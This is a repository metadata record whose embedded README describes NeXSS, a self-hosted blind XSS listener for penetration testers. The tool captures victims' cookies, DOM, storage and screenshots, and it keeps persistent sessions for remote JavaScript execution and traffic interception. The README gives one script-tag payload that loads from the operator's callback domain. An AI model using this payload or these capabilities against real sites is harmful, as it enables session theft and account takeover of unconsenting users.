{"id":35091421,"url":"https://github.com/mastomii/nexss","last_synced_at":"2026-01-16T11:45:30.455Z","repository":{"id":330358650,"uuid":"1122442840","full_name":"mastomii/nexss","owner":"mastomii","description":"NeXSS is a modern, self-hosted Blind XSS (Cross-Site Scripting) hunter and callback listener built with Next.js. It helps security researchers and penetration testers discover and validate blind XSS vulnerabilities by capturing detailed information when payloads execute on target systems.","archived":false,"fork":false,"pushed_at":"2026-01-13T17:02:59.000Z","size":6194,"stargazers_count":25,"open_issues_count":0,"forks_count":3,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-01-13T22:19:55.461Z","etag":null,"topics":["bugbounty","bughunting","cybersecurity","javascript","xss"],"latest_commit_sha":null,"homepage":"https://nexss.pages.dev","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mastomii.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-12-24T18:29:03.000Z","updated_at":"2026-01-13T15:13:01.000Z","dependencies_parsed_at":null,"dependency_job_id":null,"html_url":"https://github.com/mastomii/nexss","commit_stats":null,"previous_names":["mastomii/nexss"],"tags_count":8,"template":false,"template_full_name":null,"purl":"pkg:github/mastomii/nexss","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mastomii%2Fnexss","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mastomii%2Fnexss/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mastomii%2Fnexss/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mastomii%2Fnexss/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mastomii","download_url":"https://codeload.github.com/mastomii/nexss/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mastomii%2Fnexss/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28478365,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-16T06:30:42.265Z","status":"ssl_error","status_checked_at":"2026-01-16T06:30:16.248Z","response_time":107,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugbounty","bughunting","cybersecurity","javascript","xss"],"created_at":"2025-12-27T14:40:47.960Z","updated_at":"2026-01-16T11:45:30.434Z","avatar_url":"https://github.com/mastomii.png","language":"TypeScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n  \u003cimg src=\"public/nexss-logo-horizontal.png\" alt=\"NeXSS Logo\" width=\"250\"\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003cstrong\u003eLightweight Blind XSS Listener\u003c/strong\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"#features\"\u003eFeatures\u003c/a\u003e •\n  \u003ca href=\"#installation\"\u003eInstallation\u003c/a\u003e •\n  \u003ca href=\"#usage\"\u003eUsage\u003c/a\u003e •\n  \u003ca href=\"#configuration\"\u003eConfiguration\u003c/a\u003e\n\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\n  \u003ca href=\"https://vercel.com/new/clone?repository-url=https://github.com/mastomii/nexss\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Deploy-Vercel-000000?style=for-the-badge\u0026logo=vercel\u0026logoColor=white\" alt=\"Deploy with Vercel\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://neon.tech\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Database-Neon-00e599?style=for-the-badge\u0026logo=postgresql\u0026logoColor=white\" alt=\"Get Neon Database\"\u003e\n  \u003c/a\u003e\n  \u003ca href=\"https://dash.cloudflare.com/sign-up/r2\"\u003e\n    \u003cimg src=\"https://img.shields.io/badge/Storage-Cloudflare%20R2-f38020?style=for-the-badge\u0026logo=cloudflare\u0026logoColor=white\" alt=\"Get Cloudflare R2\"\u003e\n  \u003c/a\u003e\n\u003c/p\u003e\n\n---\n\n## Description\n\n**NeXSS** is a modern, self-hosted Blind XSS (Cross-Site Scripting) hunter and callback listener built with Next.js. It helps security researchers and penetration testers discover and validate blind XSS vulnerabilities by capturing detailed information when payloads execute on target systems.\n\nWhen your XSS payload triggers on a vulnerable application, NeXSS captures comprehensive data including cookies, DOM content, screenshots, local/session storage, and more — all delivered to your dashboard in real-time with optional Telegram notifications.\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"images/nexss-dashboard.png\" alt=\"NeXSS Dashboard\" width=\"100%\"\u003e\n  \u003cbr\u003e\n  \u003cem\u003eDashboard with real-time statistics and recent reports\u003c/em\u003e\n\u003c/p\u003e\n\n## Features\n\n| Feature | Description |\n|---------|-------------|\n| Blind XSS Detection | Automatically captures data when payloads execute |\n| Screenshot Capture | Takes screenshots of the vulnerable page using html2canvas |\n| Cookie Extraction | Captures all accessible cookies from the target |\n| DOM Capture | Stores the full HTML content of the affected page |\n| Storage Extraction | Captures localStorage and sessionStorage data |\n| Request Details | Logs URL, origin, referer, user-agent, and IP address |\n| Persistent Sessions | Maintain connection with compromised browsers for JS command execution |\n| **Traffic Interception** | **NEW** - Observe HTTP requests/responses within victim's browser session |\n| AES-256 Encryption | Secure communication channel for persistent sessions |\n| Telegram Notifications | Real-time alerts with screenshots when XSS triggers |\n| Object Storage | Store screenshots in S3, MinIO, or Cloudflare R2 |\n| JWT Authentication | Secure session management |\n| Docker Ready | Easy deployment with Docker Compose |\n\n## Installation\n\n### Prerequisites\n- Docker \u0026 Docker Compose (recommended)\n- Or: Node.js 18+ and PostgreSQL 15+\n\n### Free Cloud Deployment\n\nDeploy NeXSS for free using these services:\n\n| Service | Purpose | Free Tier |\n|---------|---------|-----------|\n| [Vercel](https://vercel.com) | Next.js Hosting | Unlimited projects |\n| [NeonDB](https://neon.tech) | PostgreSQL Database | 0.5 GB storage |\n| [Cloudflare R2](https://cloudflare.com/r2) | Object Storage | 10 GB storage |\n\n### Quick Start with Docker\n\n```bash\n# Clone the repository\ngit clone https://github.com/mastomii/nexss.git\ncd nexss\n\n# Configure environment\ncp .env.example .env\n\n# Start the application\ndocker compose up -d\n```\n\nEdit `.env` with your settings:\n\n```env\n# Database\nDATABASE_URL=postgresql://nexss:your_secure_password@db:5432/nexss\nPOSTGRES_USER=nexss\nPOSTGRES_PASSWORD=your_secure_password\nPOSTGRES_DB=nexss\n\n# Authentication (generate with: openssl rand -hex 32)\nJWT_SECRET=your_jwt_secret_here\nNEXTAUTH_SECRET=your_nextauth_secret_here\nNEXTAUTH_URL=http://localhost:3000\n\n# Public URL for payload callbacks\nNEXT_PUBLIC_APP_URL=https://your-nexss-domain.com\n```\n\nAccess the dashboard at `http://localhost:3000`\n\n| | |\n|---|---|\n| Username | `admin` |\n| Password | `admin123` |\n\n\u003e **Important:** Change the default password immediately after first login.\n\n### Manual Installation\n\n```bash\n# Clone and install\ngit clone https://github.com/mastomii/nexss.git\ncd nexss\nnpm install\n\n# Setup database\npsql -U postgres -c \"CREATE DATABASE nexss;\"\npsql -U postgres -d nexss -f init.sql\n\n# Configure and run\ncp .env.example .env.local\nnpm run build\nnpm start\n```\n\n## Usage\n\n### XSS Payloads\n\nConfigure your payloads from the Payloads page. Multiple payload formats are available:\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"images/nexss-payloads.png\" alt=\"Payload Configuration\" width=\"100%\"\u003e\n  \u003cbr\u003e\n  \u003cem\u003ePayload configuration with multiple injection formats\u003c/em\u003e\n\u003c/p\u003e\n\nBasic script tag injection:\n\n```html\n\u003cscript src=\"https://your-nexss-domain.com/\"\u003e\u003c/script\u003e\n```\n\n### Viewing Reports\n\nAll captured XSS triggers are displayed in the Reports page with filtering and search:\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"images/nexss-reports.png\" alt=\"Reports List\" width=\"100%\"\u003e\n  \u003cbr\u003e\n  \u003cem\u003eReports list with timestamps and victim information\u003c/em\u003e\n\u003c/p\u003e\n\nClick on any report to view detailed information:\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"images/nexss-report-details.png\" alt=\"Report Details\" width=\"100%\"\u003e\n  \u003cbr\u003e\n  \u003cem\u003eDetailed report view with screenshot, cookies, DOM, and storage data\u003c/em\u003e\n\u003c/p\u003e\n\n### Persistent Sessions\n\nEnable persistent mode to maintain a connection with compromised browsers. This allows you to:\n\n- Execute JavaScript commands in the victim's browser\n- Retrieve additional data on-demand\n- Perform actions as the victim user\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"images/nexss-persistent-mode.png\" alt=\"Persistent Mode\" width=\"100%\"\u003e\n  \u003cbr\u003e\n  \u003cem\u003eRemote command execution on compromised browser sessions\u003c/em\u003e\n\u003c/p\u003e\n\n\u003e **Note:** AES encryption for persistent sessions requires the target page to be served over HTTPS (Web Crypto API limitation). On HTTP targets, commands are sent unencrypted.\n\n### Traffic Interception (NEW)\n\n**Traffic Interception** allows you to observe HTTP requests and responses happening within the victim's browser session. This feature provides visibility into API calls, form submissions, and navigation events.\n\n\u003cp align=\"left\"\u003e\n  \u003cimg src=\"https://github.com/mastomii/nexss/blob/main/images/nexss-traffic-interception-1.png?raw=true)\" alt=\"NeXSS Traffic Interception\" width=\"800\"\u003e\n\u003c/p\u003e\n\n\u003cp align=\"left\"\u003e\n  \u003cimg src=\"https://github.com/mastomii/nexss/blob/main/images/nexss-traffic-interception-2.png?raw=true)\" alt=\"NeXSS Traffic Interception\" width=\"800\"\u003e\n\u003c/p\u003e\n\n\u003cp align=\"left\"\u003e\n  \u003cimg src=\"https://github.com/mastomii/nexss/blob/main/images/nexss-traffic-interception-3.png?raw=true)\" alt=\"NeXSS Traffic Interception\" width=\"800\"\u003e\n\u003c/p\u003e\n\n#### What It Captures\n\n| Type | Description |\n|------|-------------|\n| `fetch` | Fetch API request + response (combined) |\n| `xhr` | XMLHttpRequest + response (combined) |\n| `form` | Form submission request data |\n| `navigation` | Page navigation events |\n\n#### Key Features\n\n- **Unified Request/Response Capture** - Each traffic entry contains both request and response data\n- **Complete HTTP Headers** - Reconstructs browser-inferred headers (Host, User-Agent, Accept, etc.)\n- **Raw HTTP Format** - Easy copy-paste to tools like Burp Suite\n- **Real-time Session Status** - Connected/Disconnected/Terminated states\n- **Color-coded UI** - Methods (GET=green, POST=amber, etc.) and status codes (2xx=green, 4xx+=red)\n- **Pagination** - 20 items per page for large traffic volumes\n- **One-click Copy** - Copy URLs, full requests, and full responses\n\n#### How to Enable\n\n1. Go to **Settings** → **XSS Payload Settings**\n2. Enable **Persistent Mode**\n3. Enable **Advanced Persistent Mode (Experimental)**\n4. *(Optional)* Generate an **AES-256 encryption key** for encrypted communication\n\n#### Known Limitations\n\n- **Race Condition** - Requests firing before DOM ready may not be captured\n- **HttpOnly Cookies** - Cannot be read via JavaScript\n- **Cross-Origin** - Cannot read response bodies from cross-origin requests (CORS)\n- **HTTPS Required** - AES-256 encryption only works on HTTPS targets\n- **Body Size Limits** - Request/response bodies truncated to 10KB\n\n\u003e **Note:** Traffic Interception is marked as **Experimental**. This is application-layer observation only, not network-level packet capture.\n\n## Configuration\n\n### Environment Variables\n\n| Variable | Description | Default |\n|----------|-------------|---------|\n| `DATABASE_URL` | PostgreSQL connection string | Required |\n| `JWT_SECRET` | Secret for JWT signing | Required |\n| `NEXTAUTH_SECRET` | NextAuth.js secret | Required |\n| `NEXTAUTH_URL` | Application base URL | `http://localhost:3000` |\n| `NEXT_PUBLIC_APP_URL` | Public URL for payload callbacks | Uses request host |\n| `NODE_ENV` | Environment mode | `production` |\n\n### Object Storage\n\nStore screenshots externally using S3-compatible storage:\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"images/nexss-object-storage.png\" alt=\"Object Storage Settings\" width=\"100%\"\u003e\n  \u003cbr\u003e\n  \u003cem\u003eObject storage configuration with S3, MinIO, or Cloudflare R2\u003c/em\u003e\n\u003c/p\u003e\n\nSupported providers:\n- AWS S3\n- MinIO\n- Cloudflare R2\n\n### Telegram Notifications\n\nGet real-time alerts when XSS payloads trigger:\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"images/nexss-telegram-notif.png\" alt=\"Telegram Notification\" width=\"100%\"\u003e\n  \u003cbr\u003e\n  \u003cem\u003eTelegram notification with screenshot preview\u003c/em\u003e\n\u003c/p\u003e\n\nSetup:\n1. Create a bot via [@BotFather](https://t.me/BotFather)\n2. Go to **Settings** \u003e **Telegram Notifications**\n3. Enter your bot token\n4. Send `/start` to your bot\n5. Click \"Get Chat ID\" to auto-detect\n6. Send a test message to verify\n\n## Contributing\n\nContributions are welcome. Please feel free to submit a Pull Request.\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n\n## Disclaimer\n\nThis tool is intended for **authorized security testing only**. Only use NeXSS against systems you have explicit permission to test. Unauthorized access to computer systems is illegal. The developers assume no liability for misuse of this software.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmastomii%2Fnexss","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmastomii%2Fnexss","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmastomii%2Fnexss/lists"}